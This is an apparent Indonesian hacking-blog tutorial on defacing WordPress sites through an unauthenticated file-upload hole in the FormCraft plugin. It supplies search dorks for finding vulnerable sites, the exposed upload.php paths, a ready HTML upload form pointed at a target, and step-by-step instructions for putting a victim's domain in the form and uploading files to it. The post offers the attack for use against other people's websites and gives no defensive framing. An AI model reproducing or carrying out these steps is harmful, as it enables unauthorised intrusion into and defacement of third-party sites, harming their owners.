Deface metode WordPress FormCraft Plugins
Deface metode WordPress FormCraft Plugins |
SAZFHI Exploit - Yo what's up bro, Balik lagi dengan admin yg paling tamvan ini :v, di hari ini admin ingin nge share tutorial Deface metode Wordpress Plugins FormCraft nih, CMS Wordpress dengan sejuta bug di plugin nya, oke sok langsung aja ke pembahasan nya.
Bahan Bahan :
- Only File type .txt / .jpg
- Dork :
- inurl:/wp-content/plugins/formcraft/
- inurl:/wp-content//plugins/formcraft/file-upload/
- inurl:/wp-content/plugins/formcraft/ site:.com - Exploit :
- /wp-content/plugins/formcraft/file-upload/server/php/upload.php
- /wp-content/plugins/formcraft/file-upload/server/content/upload.php - CSRF : Click Me Senpai
- Atau kalian bisa pakai CSRF ini
<form method="POST" action="http://site.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Tutorial Deface Wordpress FormCraft Plugins :
- Langkah pertama kalian dorking dulu pakai dork yang admin kasih.
- Kalo kalian ketemu site yang ada tulisan {"failed":"No file found 2"} nya Maka website itu Vuln.
- Nah abis itu kalian buka CSRF nya. Trus Kalian isi kolom kolom yg disediain.
*Kalo kalian pake script CSRF yang admin kasih, kalian edit dulu site.com nya pake site yang ingin kalian deface.
Contoh :
- Kolom 1 kalian isi target kalian
- Kolom 2 kalian isi files[]
- Langsung aja kalian klik SIMPAN - Nah pada bagian choose file, kalian pilih file yg mau kalian upload, lalu pencet UPLOAD COK. disini admin bakal nge upload file.txt
- Nah jika berhasil ter upload maka akan muncul cara akses nya, tinggal kalian copy & paste di new tab.
- Dan taraaa file text nya pun terupload....
See you next time :)
Komentar ini telah dihapus oleh pengarang.
BalasHapus